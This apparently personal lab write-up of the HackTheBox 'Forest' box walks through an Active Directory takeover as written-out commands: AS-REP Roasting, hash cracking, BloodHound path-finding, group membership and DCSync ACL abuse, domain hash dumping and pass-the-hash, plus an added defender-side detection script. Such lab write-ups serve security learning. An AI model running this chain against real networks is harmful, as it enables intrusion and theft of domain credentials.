## Box Info

| Field | Value |
|---|---|
| Platform | HackTheBox |
| Difficulty | Easy |
| OS | Windows Server 2016 |
| Key Techniques | AS-REP Roasting, BloodHound, WriteDACL Abuse, DCSync |
## Attack Path Summary

SMB null session → enumerated 31 users → AS-REP Roasted svc-alfresco (no creds needed) → cracked hash → BloodHound showed path through Account Operators → Exchange Windows Permissions → WriteDACL on domain → granted DCSync rights → dumped all hashes → Pass-the-Hash → Domain Admin.

Second AD box. First time using AS-REP Roasting, BloodHound attack paths, ACL abuse, and DCSync.
## Enumeration

```bash
echo "10.129.95.210 forest.htb.local htb.local forest" | sudo tee -a /etc/hosts
# Lesson: Add FQDN, domain, and hostname — different tools use different names
```
### SMB — User Enumeration

```bash
nxc smb $ip -u '' -p '' --users
# Found 31 users. Key users: sebastien, lucinda, svc-alfresco, andy, mark, santi
# Saved real users to valid_users.txt
```
## Foothold — AS-REP Roasting (No Creds Needed)

```bash
impacket-GetNPUsers htb.local/ -dc-ip $ip -usersfile valid_users.txt -format hashcat -outputfile asrep.txt
# svc-alfresco has "Do not require Kerberos pre-authentication" = TRUE
# Got AS-REP hash for free — no credentials needed at all
```
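An added defender-side example, not part of this writeup: it decodes the userAccountControl flag that made svc-alfresco roastable and flags 4768 (TGT request) events that show pre-auth type 0 with an RC4 ticket, which is what GetNPUsers produces. The account list and event records are constructed sample data, and the event field names are my own shorthand for the 4768 fields rather than the raw Windows event XML.

```python
# Added example, not from the writeup: defender-side checks for the AS-REP
# Roasting exposure used for the foothold. The account list and the 4768-style
# records below are CONSTRUCTED sample data, not real output from the box.
# userAccountControl bits (documented flag values)
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000  # "Do not require Kerberos pre-authentication"

# Fields of a 4768 (Kerberos TGT requested) audit event
PREAUTH_NONE = 0        # Pre-Authentication Type 0: no pre-auth was performed
ETYPE_RC4_HMAC = 0x17   # Ticket Encryption Type 0x17: RC4, hashcat mode 18200 material

# Constructed sample: (sAMAccountName, userAccountControl)
SAMPLE_ACCOUNTS = [
    ("administrator", UF_NORMAL_ACCOUNT),
    ("svc-alfresco", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH),
    ("old-svc", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE),
    ("sebastien", UF_NORMAL_ACCOUNT),
]

def asrep_roastable(accounts):
    """Return enabled accounts whose UAC has DONT_REQUIRE_PREAUTH set.

    Disabled accounts are skipped: the KDC issues them no AS-REP, so they
    are a hygiene finding rather than an immediate exposure.
    """
    return sorted(name for name, uac in accounts
                  if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE)

# Constructed sample 4768 records, reduced to the fields the check needs
SAMPLE_4768 = [
    {"account": "sebastien", "preauth_type": 2, "etype": 0x12, "client": "10.129.95.5"},
    {"account": "svc-alfresco", "preauth_type": PREAUTH_NONE, "etype": ETYPE_RC4_HMAC,
     "client": "10.10.14.7"},
    {"account": "svc-alfresco", "preauth_type": 2, "etype": 0x12, "client": "10.129.95.20"},
]

def asrep_roast_alerts(events):
    """Flag TGT requests answered with no pre-auth and an RC4-encrypted ticket.

    GetNPUsers asks for RC4 so the AS-REP can be cracked offline; a current
    Windows client using a pre-auth-exempt account normally negotiates AES.
    """
    return [(e["account"], e["client"]) for e in events
            if e["preauth_type"] == PREAUTH_NONE and e["etype"] == ETYPE_RC4_HMAC]
```

Run the first function over an LDAP export of userAccountControl values and the second over parsed 4768 events; an RC4 no-pre-auth hit from an unexpected client is the roast itself, not just the exposure.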
## Cracking

```bash
# TIP: Use single quotes when saving hashes — double quotes corrupt $ characters!
hashcat -m 18200 -a 0 alfresco.hash /usr/share/wordlists/rockyou.txt
# Cracked: s3rvice
```

First creds: svc-alfresco:s3rvice
## BloodHound — Finding the Attack Path

```bash
bloodhound-python -u 'svc-alfresco' -p 's3rvice' -ns $ip -d htb.local -c All
```

BloodHound pathfinding from SVC-ALFRESCO → DOMAIN ADMINS showed:

```text
svc-alfresco → Service Accounts → Privileged IT Accounts → Account Operators
→ GenericAll over Exchange Windows Permissions
→ WriteDACL over HTB.LOCAL domain
→ Can grant DCSync rights → Dump all hashes
```

Without BloodHound you would NEVER find this path manually. It is 5 nested groups deep. This is why BloodHound matters.
## Privilege Escalation — ACL Abuse Chain

### Step 1: Add self to Exchange Windows Permissions group

```bash
net rpc group addmem "Exchange Windows Permissions" "svc-alfresco" -U 'htb.local/svc-alfresco%s3rvice' -S $ip
```

### Step 2: Get shell via evil-winrm

```bash
evil-winrm -i $ip -u 'svc-alfresco' -p 's3rvice'
# evil-winrm features: upload, download, full PowerShell environment
```

### Step 3: Upload PowerView and grant DCSync rights

```powershell
# Run inside the evil-winrm session: upload is an evil-winrm command, the rest is PowerShell
upload /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
. .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity svc-alfresco -Rights DCSync
```

### Step 4: DCSync — dump all domain hashes

```bash
impacket-secretsdump htb.local/svc-alfresco:'s3rvice'@$ip
# Got Administrator NTLM hash
```

### Step 5: Pass-the-Hash

```bash
evil-winrm -i $ip -u 'Administrator' -H '<NTLM_HASH>'
```

Done.
## Credentials

| Username | Password/Hash | Source | Scope |
|---|---|---|---|
| svc-alfresco | s3rvice | AS-REP Roasting | Domain user |
| Administrator | NTLM hash | DCSync | Domain Admin |
## What I Learned

- AS-REP Roasting — svc-alfresco had pre-auth disabled, so the hash came for free without any credentials. Check for this before brute-forcing.
- BloodHound is non-negotiable on AD. The path through 5 nested groups to WriteDACL is invisible without it.
- ACL abuse chain: GenericAll over a group = add yourself. WriteDACL over the domain = grant yourself any permission. DCSync = dump every hash in the domain.
- evil-winrm is king for AD post-exploitation: upload/download files and run PowerShell scripts directly. Use it whenever port 5985 is open.
- Hash file corruption — when saving hashes with echo, use SINGLE quotes: `echo '$hash' > file.txt`. With double quotes bash expands the `$` sequences and corrupts the hash. Wasted time on this.
- Pattern: “AS-REP Roast first (no creds needed), BloodHound second (find the path), ACL abuse third (walk the path).”